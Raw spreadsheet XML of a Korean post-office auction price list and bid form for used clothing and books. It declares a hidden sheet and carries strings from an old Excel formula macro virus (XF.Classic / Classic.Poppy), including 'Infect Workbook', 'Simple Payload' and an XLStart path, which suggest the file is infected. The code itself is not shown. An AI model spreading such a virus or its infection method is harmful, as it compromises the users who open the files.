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377120071\Desktop\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <x:bookViews>
    <x:workbookView xWindow="0" yWindow="0" windowWidth="28545" windowHeight="11610"/>
  </x:bookViews>
  <x:sheets>
    <x:sheet name="예정가격" sheetId="1" r:id="rId4"/>
    <x:sheet name="입찰서" sheetId="2" r:id="rId5"/>
    <x:sheet name="VXXXXXXX" sheetId="3" state="hidden" r:id="rId6"/>
  </x:sheets>
  <x:definedNames>
    <x:definedName name="_xlnm.Print_Area" localSheetId="0">예정가격!$A$1:$M$18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<x:sst xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:x="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="112" uniqueCount="65">
  <x:si>
    <x:t>위와 같이 응찰하며 낙찰 후에는 교환 및 환불이 불가함에
동의하고 응찰에 신중을 기하였음을 확인합니다.</x:t>
  </x:si>
  <x:si>
    <x:t>보고2001하기피복.xls?down_num=986276279&amp;board=cug12_66&amp;command=down_load&amp;filename=보고2001하기피복.xls</x:t>
  </x:si>
  <x:si>
    <x:t>비고</x:t>
  </x:si>
  <x:si>
    <x:t>사진</x:t>
  </x:si>
  <x:si>
    <x:t>개</x:t>
  </x:si>
  <x:si>
    <x:t>규격</x:t>
  </x:si>
  <x:si>
    <x:t>책</x:t>
  </x:si>
  <x:si>
    <x:t>단위</x:t>
  </x:si>
  <x:si>
    <x:t>수량</x:t>
  </x:si>
  <x:si>
    <x:t>품명</x:t>
  </x:si>
  <x:si>
    <x:t>순번</x:t>
  </x:si>
  <x:si>
    <x:t>신품</x:t>
  </x:si>
  <x:si>
    <x:t>중고품</x:t>
  </x:si>
  <x:si>
    <x:t>권</x:t>
  </x:si>
  <x:si>
    <x:t>○</x:t>
  </x:si>
  <x:si>
    <x:t>연락처</x:t>
  </x:si>
  <x:si>
    <x:t>여자의류
(상의)</x:t>
  </x:si>
  <x:si>
    <x:t>춘천우체국장 귀하</x:t>
  </x:si>
  <x:si>
    <x:t>응찰일시
(미기재)</x:t>
  </x:si>
  <x:si>
    <x:t>여자의류
(가죽바지)</x:t>
  </x:si>
  <x:si>
    <x:t>예정가격
(단위:원)</x:t>
  </x:si>
  <x:si>
    <x:t>춘천-12</x:t>
  </x:si>
  <x:si>
    <x:t>춘천-10</x:t>
  </x:si>
  <x:si>
    <x:t>22-2</x:t>
  </x:si>
  <x:si>
    <x:t>입  찰  서</x:t>
  </x:si>
  <x:si>
    <x:t>춘천-7</x:t>
  </x:si>
  <x:si>
    <x:t>Sheet1</x:t>
  </x:si>
  <x:si>
    <x:t>최고가 낙찰</x:t>
  </x:si>
  <x:si>
    <x:t>춘천-5</x:t>
  </x:si>
  <x:si>
    <x:t>입찰희망가</x:t>
  </x:si>
  <x:si>
    <x:t>춘천-1</x:t>
  </x:si>
  <x:si>
    <x:t>춘천-3</x:t>
  </x:si>
  <x:si>
    <x:t>춘천-9</x:t>
  </x:si>
  <x:si>
    <x:t>성  명</x:t>
  </x:si>
  <x:si>
    <x:t>춘천-2</x:t>
  </x:si>
  <x:si>
    <x:t>춘천-6</x:t>
  </x:si>
  <x:si>
    <x:t>물품의 상태</x:t>
  </x:si>
  <x:si>
    <x:t>상품번호</x:t>
  </x:si>
  <x:si>
    <x:t>22-3</x:t>
  </x:si>
  <x:si>
    <x:t>일련번호</x:t>
  </x:si>
  <x:si>
    <x:t>춘천-4</x:t>
  </x:si>
  <x:si>
    <x:t>춘천-8</x:t>
  </x:si>
  <x:si>
    <x:t>관리번호</x:t>
  </x:si>
  <x:si>
    <x:t>여자 장부츠</x:t>
  </x:si>
  <x:si>
    <x:t>22-4</x:t>
  </x:si>
  <x:si>
    <x:t>22-1</x:t>
  </x:si>
  <x:si>
    <x:t>춘천-11</x:t>
  </x:si>
  <x:si>
    <x:t>여자의류
(상의 점퍼)</x:t>
  </x:si>
  <x:si>
    <x:t>With Lord Natas</x:t>
  </x:si>
  <x:si>
    <x:t>의류
(여자 상의 5개)</x:t>
  </x:si>
  <x:si>
    <x:t>2023.   .    .</x:t>
  </x:si>
  <x:si>
    <x:r>
      <x:t xml:space="preserve">                      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8"/>
            <x:color rgb="ff000000"/>
            <x:b val="1"/>
          </x:rPr>
        </mc:Fallback>
      </mc:AlternateContent>
      <x:t xml:space="preserve">    인)</x:t>
    </x:r>
  </x:si>
  <x:si>
    <x:t>Hydrocodone/APAP 10-650 For Your Computer</x:t>
  </x:si>
  <x:si>
    <x:t>An Excel Formula Macro Virus (XF.Classic)</x:t>
  </x:si>
  <x:si>
    <x:t>여자 의류
(잠퍼1개, 상의1개,청바지2개, 청치마2개)</x:t>
  </x:si>
  <x:si>
    <x:t>**Set Our Values and Paths**</x:t>
  </x:si>
  <x:si>
    <x:t>(C) The Narkotic Network 1998</x:t>
  </x:si>
  <x:si>
    <x:t>**Add New Workbook, Infect It, Save It As Book1.xls**</x:t>
  </x:si>
  <x:si>
    <x:t>C:\PROGRAM FILES\MICROSOFT OFFICE\OFFICE\xlstart\Book1.</x:t>
  </x:si>
  <x:si>
    <x:t>**Auto and On Sheet Starts Here**</x:t>
  </x:si>
  <x:si>
    <x:t xml:space="preserve">입찰 물품 사진 및 예정가격 </x:t>
  </x:si>
  <x:si>
    <x:t>**Simple Payload**</x:t>
  </x:si>
  <x:si>
    <x:t>**Infect Workbook**</x:t>
  </x:si>
  <x:si>
    <x:t>Classic.Poppy by VicodinES</x:t>
  </x:si>
  <x:si>
    <x:t>물품 수령후 반품은 안되니 경매시 현품을 보시고 참가하시기 바랍니다.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</x:si>
</x:sst>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6"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Arial"/>
      <x:sz val="10"/>
      <x:color rgb="ff000000"/>
    </x:font>
    <x:font>
      <x:name val="Arial"/>
      <x:sz val="10"/>
      <x:color rgb="ffff0000"/>
      <x:b val="1"/>
    </x:font>
    <x:font>
      <x:name val="Arial"/>
      <x:sz val="10"/>
      <x:color rgb="ff000000"/>
      <x:b val="1"/>
    </x:fo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808080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hair">
        <x:color auto="1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8" fontId="0" fillId="0" borderId="0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38" fontId="0" fillId="0" borderId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
          <x:alignment horizontal="general" vertical="bottom"/>
        </x:xf>
      </mc:Fallback>
    </mc:AlternateContent>
  </x:cellStyleXfs>
  <x:cellXfs count="7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0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1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2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3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6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5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5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6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8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8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41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0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3" fillId="7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9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7" borderId="9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10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7" borderId="1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10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7" borderId="1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11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3" fillId="7" borderId="1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4" fillId="7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4" fillId="7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4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5" fillId="8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6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7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7" fillId="7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41" fontId="16" fillId="0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7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17" fillId="7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2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
          <x:alignment horizontal="center" vertical="center" wrapText="1"/>
        </x:xf>
      </mc:Fallback>
    </mc:AlternateContent>
    <x:xf numFmtId="0" fontId="18" fillId="0" borderId="12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9" fillId="7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6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6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5" fillId="8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8" borderId="1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41" fontId="15" fillId="8" borderId="1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8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41" fontId="15" fillId="8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5" fillId="8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1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4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2" fillId="7" borderId="14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5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2" fillId="7" borderId="1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6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2" fillId="7" borderId="16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3" fillId="7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3" fillId="7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7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7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7" borderId="18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3" fontId="24" fillId="7" borderId="18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7" borderId="18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4" fillId="7" borderId="18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7" borderId="19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4" fillId="7" borderId="19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20" xfId="0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3" fillId="7" borderId="2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7" borderId="21" xfId="0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3" fillId="7" borderId="2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7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2" fillId="7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2" fillId="7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7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4" fillId="7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7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4" fillId="7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7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24" fillId="7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4" fillId="7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4" fillId="7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4" fillId="7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3" fillId="7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3" fillId="7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4" fillId="7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4" fillId="7" borderId="1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콤마[0]" xfId="1" builtinId="6"/>
    <x:cellStyle name="콤마 [0]_~MF363C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1.png"  /><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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5</xdr:col>
      <xdr:colOff>38100</xdr:colOff>
      <xdr:row>5</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>6</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>9</xdr:row>
      <xdr:rowOff>9525</xdr:rowOff>
    </xdr:to>
    <xdr:pic macro="" fPublished="0">
      <xdr:nvPicPr>
        <xdr:cNvPr id="15" name="그림 15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3776662" y="1281545"/>
          <a:ext cx="1505383" cy="4199659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9525</xdr:colOff>
      <xdr:row>9</xdr:row>
      <xdr:rowOff>9525</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>5</xdr:col>
      <xdr:colOff>1533525</xdr:colOff>
      <xdr:row>12</xdr:row>
      <xdr:rowOff>1028700</xdr:rowOff>
    </xdr:to>
    <xdr:pic macro="" fPublished="0">
      <xdr:nvPicPr>
        <xdr:cNvPr id="16" name="그림 16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3749386" y="5481204"/>
          <a:ext cx="1524000" cy="4165022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9525</xdr:colOff>
      <xdr:row>12</xdr:row>
      <xdr:rowOff>1028700</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>5</xdr:col>
      <xdr:colOff>1533525</xdr:colOff>
      <xdr:row>17</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:to>
    <xdr:pic macro="" fPublished="0">
      <xdr:nvPicPr>
        <xdr:cNvPr id="17" name="그림 17"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill rotWithShape="1">
        <a:blip r:embed="rId3"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="3749386" y="9646226"/>
          <a:ext cx="1524000" cy="4165888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000ff"/>
  </x:sheetPr>
  <x:dimension ref="B2:M18"/>
  <x:sheetViews>
    <x:sheetView showGridLines="0" tabSelected="1" topLeftCell="A1" zoomScale="110" zoomScaleNormal="110" zoomScaleSheetLayoutView="110" workbookViewId="0">
      <x:selection activeCell="H15" activeCellId="0" sqref="H15:H15"/>
    </x:sheetView>
  </x:sheetViews>
  <x:sheetFormatPr defaultColWidth="8.77734375" defaultRowHeight="11.949999999999999"/>
  <x:cols>
    <x:col min="1" max="1" width="0.83203125" style="15" customWidth="1"/>
    <x:col min="2" max="2" width="8.33203125" style="15" customWidth="1"/>
    <x:col min="3" max="3" width="13.05859375" style="15" bestFit="1" customWidth="1"/>
    <x:col min="4" max="4" width="13.13671875" style="15" bestFit="1" customWidth="1"/>
    <x:col min="5" max="5" width="30" style="15" customWidth="1"/>
    <x:col min="6" max="6" width="27" style="15" customWidth="1"/>
    <x:col min="7" max="7" width="7.6640625" style="15" customWidth="1"/>
    <x:col min="8" max="8" width="9.25" style="15" customWidth="1"/>
    <x:col min="9" max="9" width="8.375" style="15" customWidth="1"/>
    <x:col min="10" max="10" width="9.5" style="15" customWidth="1"/>
    <x:col min="11" max="11" width="9.16796875" style="15" customWidth="1"/>
    <x:col min="12" max="12" width="22.76953125" style="17" bestFit="1" customWidth="1"/>
    <x:col min="13" max="13" width="34.0078125" style="15" bestFit="1" customWidth="1"/>
    <x:col min="14" max="16384" width="9.33203125" style="15" customWidth="1"/>
  </x:cols>
  <x:sheetData>
    <x:row r="1" ht="12.5" customHeight="1"/>
    <x:row r="2" spans="2:13" ht="33.75" customHeight="1">
      <x:c r="B2" s="46" t="s">
        <x:v>60</x:v>
      </x:c>
      <x:c r="C2" s="46"/>
      <x:c r="D2" s="46"/>
      <x:c r="E2" s="46"/>
      <x:c r="F2" s="46"/>
      <x:c r="G2" s="46"/>
      <x:c r="H2" s="46"/>
      <x:c r="I2" s="46"/>
      <x:c r="J2" s="46"/>
      <x:c r="K2" s="46"/>
      <x:c r="L2" s="46"/>
      <x:c r="M2" s="46"/>
    </x:row>
    <x:row r="3" spans="2:13" ht="12.75" customHeight="1">
      <x:c r="B3" s="47"/>
      <x:c r="C3" s="47"/>
      <x:c r="D3" s="47"/>
      <x:c r="E3" s="47"/>
      <x:c r="F3" s="47"/>
      <x:c r="G3" s="47"/>
      <x:c r="H3" s="47"/>
      <x:c r="I3" s="47"/>
      <x:c r="J3" s="47"/>
      <x:c r="K3" s="47"/>
      <x:c r="L3" s="47"/>
      <x:c r="M3" s="47"/>
    </x:row>
    <x:row r="4" spans="2:13" s="16" customFormat="1" ht="20" customHeight="1">
      <x:c r="B4" s="41" t="s">
        <x:v>10</x:v>
      </x:c>
      <x:c r="C4" s="41" t="s">
        <x:v>42</x:v>
      </x:c>
      <x:c r="D4" s="44" t="s">
        <x:v>37</x:v>
      </x:c>
      <x:c r="E4" s="41" t="s">
        <x:v>9</x:v>
      </x:c>
      <x:c r="F4" s="41" t="s">
        <x:v>3</x:v>
      </x:c>
      <x:c r="G4" s="41" t="s">
        <x:v>5</x:v>
      </x:c>
      <x:c r="H4" s="41" t="s">
        <x:v>7</x:v>
      </x:c>
      <x:c r="I4" s="41" t="s">
        <x:v>8</x:v>
      </x:c>
      <x:c r="J4" s="41" t="s">
        <x:v>36</x:v>
      </x:c>
      <x:c r="K4" s="41"/>
      <x:c r="L4" s="42" t="s">
        <x:v>20</x:v>
      </x:c>
      <x:c r="M4" s="42" t="s">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="5" spans="2:13" s="16" customFormat="1" ht="20" customHeight="1">
      <x:c r="B5" s="41"/>
      <x:c r="C5" s="41"/>
      <x:c r="D5" s="41"/>
      <x:c r="E5" s="41"/>
      <x:c r="F5" s="41"/>
      <x:c r="G5" s="41"/>
      <x:c r="H5" s="41"/>
      <x:c r="I5" s="41"/>
      <x:c r="J5" s="28" t="s">
        <x:v>11</x:v>
      </x:c>
      <x:c r="K5" s="28" t="s">
        <x:v>12</x:v>
      </x:c>
      <x:c r="L5" s="43"/>
      <x:c r="M5" s="43"/>
    </x:row>
    <x:row r="6" spans="2:13" s="16" customFormat="1" ht="82.5" customHeight="1">
      <x:c r="B6" s="29">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C6" s="30" t="s">
        <x:v>45</x:v>
      </x:c>
      <x:c r="D6" s="29" t="s">
        <x:v>30</x:v>
      </x:c>
      <x:c r="E6" s="40" t="s">
        <x:v>16</x:v>
      </x:c>
      <x:c r="F6" s="29"/>
      <x:c r="G6" s="29"/>
      <x:c r="H6" s="29" t="s">
        <x:v>4</x:v>
      </x:c>
      <x:c r="I6" s="29">
        <x:v>2</x:v>
      </x:c>
      <x:c r="J6" s="29"/>
      <x:c r="K6" s="29" t="s">
        <x:v>14</x:v>
      </x:c>
      <x:c r="L6" s="31" t="s">
        <x:v>27</x:v>
      </x:c>
      <x:c r="M6" s="32"/>
    </x:row>
    <x:row r="7" spans="2:13" s="16" customFormat="1" ht="82.5" customHeight="1">
      <x:c r="B7" s="29">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C7" s="30" t="s">
        <x:v>45</x:v>
      </x:c>
      <x:c r="D7" s="29" t="s">
        <x:v>34</x:v>
      </x:c>
      <x:c r="E7" s="39" t="s">
        <x:v>16</x:v>
      </x:c>
      <x:c r="F7" s="29"/>
      <x:c r="G7" s="29"/>
      <x:c r="H7" s="29" t="s">
        <x:v>4</x:v>
      </x:c>
      <x:c r="I7" s="29">
        <x:v>3</x:v>
      </x:c>
      <x:c r="J7" s="29"/>
      <x:c r="K7" s="29" t="s">
        <x:v>14</x:v>
      </x:c>
      <x:c r="L7" s="31" t="s">
        <x:v>27</x:v>
      </x:c>
      <x:c r="M7" s="32"/>
    </x:row>
    <x:row r="8" spans="2:13" s="16" customFormat="1" ht="82.5" customHeight="1">
      <x:c r="B8" s="29">
        <x:v>3</x:v>
      </x:c>
      <x:c r="C8" s="30" t="s">
        <x:v>45</x:v>
      </x:c>
      <x:c r="D8" s="29" t="s">
        <x:v>31</x:v>
      </x:c>
      <x:c r="E8" s="40" t="s">
        <x:v>47</x:v>
      </x:c>
      <x:c r="F8" s="29"/>
      <x:c r="G8" s="29"/>
      <x:c r="H8" s="29" t="s">
        <x:v>4</x:v>
      </x:c>
      <x:c r="I8" s="29">
        <x:v>2</x:v>
      </x:c>
      <x:c r="J8" s="29"/>
      <x:c r="K8" s="29" t="s">
        <x:v>14</x:v>
      </x:c>
      <x:c r="L8" s="31" t="s">
        <x:v>27</x:v>
      </x:c>
      <x:c r="M8" s="32"/>
    </x:row>
    <x:row r="9" spans="2:13" s="16" customFormat="1" ht="82.5" customHeight="1">
      <x:c r="B9" s="29">
        <x:v>4</x:v>
      </x:c>
      <x:c r="C9" s="30" t="s">
        <x:v>45</x:v>
      </x:c>
      <x:c r="D9" s="29" t="s">
        <x:v>40</x:v>
      </x:c>
      <x:c r="E9" s="40" t="s">
        <x:v>47</x:v>
      </x:c>
      <x:c r="F9" s="29"/>
      <x:c r="G9" s="29"/>
      <x:c r="H9" s="29" t="s">
        <x:v>4</x:v>
      </x:c>
      <x:c r="I9" s="29">
        <x:v>1</x:v>
      </x:c>
      <x:c r="J9" s="29"/>
      <x:c r="K9" s="29" t="s">
        <x:v>14</x:v>
      </x:c>
      <x:c r="L9" s="31" t="s">
        <x:v>27</x:v>
      </x:c>
      <x:c r="M9" s="32"/>
    </x:row>
    <x:row r="10" spans="2:13" s="16" customFormat="1" ht="82.5" customHeight="1">
      <x:c r="B10" s="29">
        <x:v>5</x:v>
      </x:c>
      <x:c r="C10" s="30" t="s">
        <x:v>45</x:v>
      </x:c>
      <x:c r="D10" s="29" t="s">
        <x:v>28</x:v>
      </x:c>
      <x:c r="E10" s="39" t="s">
        <x:v>47</x:v>
      </x:c>
      <x:c r="F10" s="29"/>
      <x:c r="G10" s="29"/>
      <x:c r="H10" s="29" t="s">
        <x:v>4</x:v>
      </x:c>
      <x:c r="I10" s="29">
        <x:v>1</x:v>
      </x:c>
      <x:c r="J10" s="29"/>
      <x:c r="K10" s="29" t="s">
        <x:v>14</x:v>
      </x:c>
      <x:c r="L10" s="31" t="s">
        <x:v>27</x:v>
      </x:c>
      <x:c r="M10" s="32"/>
    </x:row>
    <x:row r="11" spans="2:13" s="16" customFormat="1" ht="82.5" customHeight="1">
      <x:c r="B11" s="29">
        <x:v>6</x:v>
      </x:c>
      <x:c r="C11" s="30" t="s">
        <x:v>45</x:v>
      </x:c>
      <x:c r="D11" s="29" t="s">
        <x:v>35</x:v>
      </x:c>
      <x:c r="E11" s="39" t="s">
        <x:v>16</x:v>
      </x:c>
      <x:c r="F11" s="29"/>
      <x:c r="G11" s="29"/>
      <x:c r="H11" s="29" t="s">
        <x:v>4</x:v>
      </x:c>
      <x:c r="I11" s="29">
        <x:v>4</x:v>
      </x:c>
      <x:c r="J11" s="29"/>
      <x:c r="K11" s="29" t="s">
        <x:v>14</x:v>
      </x:c>
      <x:c r="L11" s="31" t="s">
        <x:v>27</x:v>
      </x:c>
      <x:c r="M11" s="32"/>
    </x:row>
    <x:row r="12" spans="2:13" s="16" customFormat="1" ht="82.5" customHeight="1">
      <x:c r="B12" s="29">
        <x:v>7</x:v>
      </x:c>
      <x:c r="C12" s="30" t="s">
        <x:v>45</x:v>
      </x:c>
      <x:c r="D12" s="29" t="s">
        <x:v>25</x:v>
      </x:c>
      <x:c r="E12" s="39" t="s">
        <x:v>19</x:v>
      </x:c>
      <x:c r="F12" s="29"/>
      <x:c r="G12" s="29"/>
      <x:c r="H12" s="29" t="s">
        <x:v>4</x:v>
      </x:c>
      <x:c r="I12" s="29">
        <x:v>1</x:v>
      </x:c>
      <x:c r="J12" s="29"/>
      <x:c r="K12" s="29" t="s">
        <x:v>14</x:v>
      </x:c>
      <x:c r="L12" s="31" t="s">
        <x:v>27</x:v>
      </x:c>
      <x:c r="M12" s="32"/>
    </x:row>
    <x:row r="13" spans="2:13" ht="81.75" customHeight="1">
      <x:c r="B13" s="29">
        <x:v>8</x:v>
      </x:c>
      <x:c r="C13" s="30" t="s">
        <x:v>23</x:v>
      </x:c>
      <x:c r="D13" s="29" t="s">
        <x:v>41</x:v>
      </x:c>
      <x:c r="E13" s="33" t="s">
        <x:v>43</x:v>
      </x:c>
      <x:c r="F13" s="34"/>
      <x:c r="G13" s="35"/>
      <x:c r="H13" s="36" t="s">
        <x:v>4</x:v>
      </x:c>
      <x:c r="I13" s="36">
        <x:v>1</x:v>
      </x:c>
      <x:c r="J13" s="36"/>
      <x:c r="K13" s="29" t="s">
        <x:v>14</x:v>
      </x:c>
      <x:c r="L13" s="31" t="s">
        <x:v>27</x:v>
      </x:c>
      <x:c r="M13" s="32"/>
    </x:row>
    <x:row r="14" spans="2:13" s="15" customFormat="1" ht="81.75" customHeight="1">
      <x:c r="B14" s="29">
        <x:v>9</x:v>
      </x:c>
      <x:c r="C14" s="30" t="s">
        <x:v>23</x:v>
      </x:c>
      <x:c r="D14" s="29" t="s">
        <x:v>32</x:v>
      </x:c>
      <x:c r="E14" s="37" t="s">
        <x:v>54</x:v>
      </x:c>
      <x:c r="F14" s="34"/>
      <x:c r="G14" s="35"/>
      <x:c r="H14" s="36" t="s">
        <x:v>4</x:v>
      </x:c>
      <x:c r="I14" s="36">
        <x:v>6</x:v>
      </x:c>
      <x:c r="J14" s="36"/>
      <x:c r="K14" s="29" t="s">
        <x:v>14</x:v>
      </x:c>
      <x:c r="L14" s="31" t="s">
        <x:v>27</x:v>
      </x:c>
      <x:c r="M14" s="32"/>
    </x:row>
    <x:row r="15" spans="2:13" s="15" customFormat="1" ht="81.75" customHeight="1">
      <x:c r="B15" s="29">
        <x:v>10</x:v>
      </x:c>
      <x:c r="C15" s="30" t="s">
        <x:v>38</x:v>
      </x:c>
      <x:c r="D15" s="29" t="s">
        <x:v>22</x:v>
      </x:c>
      <x:c r="E15" s="33" t="s">
        <x:v>49</x:v>
      </x:c>
      <x:c r="F15" s="34"/>
      <x:c r="G15" s="35"/>
      <x:c r="H15" s="36" t="s">
        <x:v>4</x:v>
      </x:c>
      <x:c r="I15" s="36">
        <x:v>5</x:v>
      </x:c>
      <x:c r="J15" s="36"/>
      <x:c r="K15" s="29" t="s">
        <x:v>14</x:v>
      </x:c>
      <x:c r="L15" s="31" t="s">
        <x:v>27</x:v>
      </x:c>
      <x:c r="M15" s="32"/>
    </x:row>
    <x:row r="16" spans="2:13" s="15" customFormat="1" ht="81.75" customHeight="1">
      <x:c r="B16" s="29">
        <x:v>11</x:v>
      </x:c>
      <x:c r="C16" s="30" t="s">
        <x:v>38</x:v>
      </x:c>
      <x:c r="D16" s="29" t="s">
        <x:v>46</x:v>
      </x:c>
      <x:c r="E16" s="33" t="s">
        <x:v>49</x:v>
      </x:c>
      <x:c r="F16" s="34"/>
      <x:c r="G16" s="35"/>
      <x:c r="H16" s="36" t="s">
        <x:v>4</x:v>
      </x:c>
      <x:c r="I16" s="36">
        <x:v>5</x:v>
      </x:c>
      <x:c r="J16" s="36"/>
      <x:c r="K16" s="29" t="s">
        <x:v>14</x:v>
      </x:c>
      <x:c r="L16" s="31" t="s">
        <x:v>27</x:v>
      </x:c>
      <x:c r="M16" s="32"/>
    </x:row>
    <x:row r="17" spans="2:13" s="15" customFormat="1" ht="81.75" customHeight="1">
      <x:c r="B17" s="29">
        <x:v>12</x:v>
      </x:c>
      <x:c r="C17" s="30" t="s">
        <x:v>44</x:v>
      </x:c>
      <x:c r="D17" s="29" t="s">
        <x:v>21</x:v>
      </x:c>
      <x:c r="E17" s="38" t="s">
        <x:v>6</x:v>
      </x:c>
      <x:c r="F17" s="34"/>
      <x:c r="G17" s="35"/>
      <x:c r="H17" s="36" t="s">
        <x:v>13</x:v>
      </x:c>
      <x:c r="I17" s="36">
        <x:v>3</x:v>
      </x:c>
      <x:c r="J17" s="36"/>
      <x:c r="K17" s="29" t="s">
        <x:v>14</x:v>
      </x:c>
      <x:c r="L17" s="31" t="s">
        <x:v>27</x:v>
      </x:c>
      <x:c r="M17" s="32"/>
    </x:row>
    <x:row r="18" spans="2:13" ht="71.25" customHeight="1">
      <x:c r="B18" s="45" t="s">
        <x:v>64</x:v>
      </x:c>
      <x:c r="C18" s="45"/>
      <x:c r="D18" s="45"/>
      <x:c r="E18" s="45"/>
      <x:c r="F18" s="45"/>
      <x:c r="G18" s="45"/>
      <x:c r="H18" s="45"/>
      <x:c r="I18" s="45"/>
      <x:c r="J18" s="45"/>
      <x:c r="K18" s="45"/>
      <x:c r="L18" s="45"/>
      <x:c r="M18" s="45"/>
    </x:row>
  </x:sheetData>
  <x:mergeCells count="13">
    <x:mergeCell ref="H4:H5"/>
    <x:mergeCell ref="I4:I5"/>
    <x:mergeCell ref="J4:K4"/>
    <x:mergeCell ref="L4:L5"/>
    <x:mergeCell ref="B4:B5"/>
    <x:mergeCell ref="D4:D5"/>
    <x:mergeCell ref="E4:E5"/>
    <x:mergeCell ref="G4:G5"/>
    <x:mergeCell ref="M4:M5"/>
    <x:mergeCell ref="F4:F5"/>
    <x:mergeCell ref="B18:M18"/>
    <x:mergeCell ref="B2:M3"/>
    <x:mergeCell ref="C4:C5"/>
  </x:mergeCells>
  <x:pageMargins left="0.19666667282581329" right="0.19666667282581329" top="0.49458333849906921" bottom="0.41111111640930176" header="0.51138889789581299" footer="0.51138889789581299"/>
  <x:pageSetup paperSize="9" scale="93" firstPageNumber="1" fitToWidth="1" fitToHeight="1" orientation="landscape" usePrinterDefaults="1" blackAndWhite="0" draft="0" useFirstPageNumber="0" horizontalDpi="600" verticalDpi="600" copies="1"/>
  <x:rowBreaks count="1" manualBreakCount="1">
    <x:brk id="18" min="0" max="1048575" man="1" pt="0"/>
  </x:rowBreaks>
  <x:colBreaks count="1" manualBreakCount="1">
    <x:brk id="13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8000"/>
  </x:sheetPr>
  <x:dimension ref="A1:I44"/>
  <x:sheetViews>
    <x:sheetView showGridLines="0" view="pageBreakPreview" topLeftCell="A1" zoomScaleNormal="100" zoomScaleSheetLayoutView="100" workbookViewId="0">
      <x:selection activeCell="Q6" activeCellId="0" sqref="Q6:Q6"/>
    </x:sheetView>
  </x:sheetViews>
  <x:sheetFormatPr defaultColWidth="8.77734375" defaultRowHeight="12.5"/>
  <x:cols>
    <x:col min="1" max="1" width="5.33203125" style="14" customWidth="1"/>
    <x:col min="2" max="2" width="34.66796875" style="14" customWidth="1"/>
    <x:col min="3" max="7" width="9.33203125" style="14" customWidth="1"/>
    <x:col min="8" max="8" width="0" style="14" hidden="1" customWidth="1"/>
    <x:col min="9" max="9" width="43.66796875" style="14" customWidth="1"/>
    <x:col min="10" max="16384" width="9.33203125" style="14" customWidth="1"/>
  </x:cols>
  <x:sheetData>
    <x:row r="1" spans="1:9" ht="50.100000000000001" customHeight="1">
      <x:c r="A1" s="21"/>
      <x:c r="B1" s="59" t="s">
        <x:v>24</x:v>
      </x:c>
      <x:c r="C1" s="59"/>
      <x:c r="D1" s="59"/>
      <x:c r="E1" s="59"/>
      <x:c r="F1" s="59"/>
      <x:c r="G1" s="59"/>
      <x:c r="H1" s="59"/>
      <x:c r="I1" s="60"/>
    </x:row>
    <x:row r="2" spans="1:9" ht="30" customHeight="1">
      <x:c r="A2" s="22"/>
      <x:c r="B2" s="61"/>
      <x:c r="C2" s="61"/>
      <x:c r="D2" s="61"/>
      <x:c r="E2" s="61"/>
      <x:c r="F2" s="61"/>
      <x:c r="G2" s="61"/>
      <x:c r="H2" s="61"/>
      <x:c r="I2" s="62"/>
    </x:row>
    <x:row r="3" spans="1:9" s="18" customFormat="1" ht="64.5" customHeight="1">
      <x:c r="A3" s="51" t="s">
        <x:v>33</x:v>
      </x:c>
      <x:c r="B3" s="52"/>
      <x:c r="C3" s="71" t="s">
        <x:v>51</x:v>
      </x:c>
      <x:c r="D3" s="71"/>
      <x:c r="E3" s="71"/>
      <x:c r="F3" s="71"/>
      <x:c r="G3" s="71"/>
      <x:c r="H3" s="71"/>
      <x:c r="I3" s="72"/>
    </x:row>
    <x:row r="4" spans="1:9" s="18" customFormat="1" ht="64.5" customHeight="1">
      <x:c r="A4" s="51" t="s">
        <x:v>15</x:v>
      </x:c>
      <x:c r="B4" s="52"/>
      <x:c r="C4" s="57"/>
      <x:c r="D4" s="57"/>
      <x:c r="E4" s="57"/>
      <x:c r="F4" s="57"/>
      <x:c r="G4" s="57"/>
      <x:c r="H4" s="57"/>
      <x:c r="I4" s="58"/>
    </x:row>
    <x:row r="5" spans="1:9" s="18" customFormat="1" ht="64.5" customHeight="1">
      <x:c r="A5" s="51" t="s">
        <x:v>39</x:v>
      </x:c>
      <x:c r="B5" s="52"/>
      <x:c r="C5" s="57"/>
      <x:c r="D5" s="57"/>
      <x:c r="E5" s="57"/>
      <x:c r="F5" s="57"/>
      <x:c r="G5" s="57"/>
      <x:c r="H5" s="57"/>
      <x:c r="I5" s="58"/>
    </x:row>
    <x:row r="6" spans="1:9" s="18" customFormat="1" ht="64.5" customHeight="1">
      <x:c r="A6" s="51" t="s">
        <x:v>37</x:v>
      </x:c>
      <x:c r="B6" s="52"/>
      <x:c r="C6" s="56"/>
      <x:c r="D6" s="57"/>
      <x:c r="E6" s="57"/>
      <x:c r="F6" s="57"/>
      <x:c r="G6" s="57"/>
      <x:c r="H6" s="57"/>
      <x:c r="I6" s="58"/>
    </x:row>
    <x:row r="7" spans="1:9" s="18" customFormat="1" ht="64.5" customHeight="1">
      <x:c r="A7" s="51" t="s">
        <x:v>9</x:v>
      </x:c>
      <x:c r="B7" s="52"/>
      <x:c r="C7" s="56"/>
      <x:c r="D7" s="57"/>
      <x:c r="E7" s="57"/>
      <x:c r="F7" s="57"/>
      <x:c r="G7" s="57"/>
      <x:c r="H7" s="57"/>
      <x:c r="I7" s="58"/>
    </x:row>
    <x:row r="8" spans="1:9" s="18" customFormat="1" ht="64.5" customHeight="1">
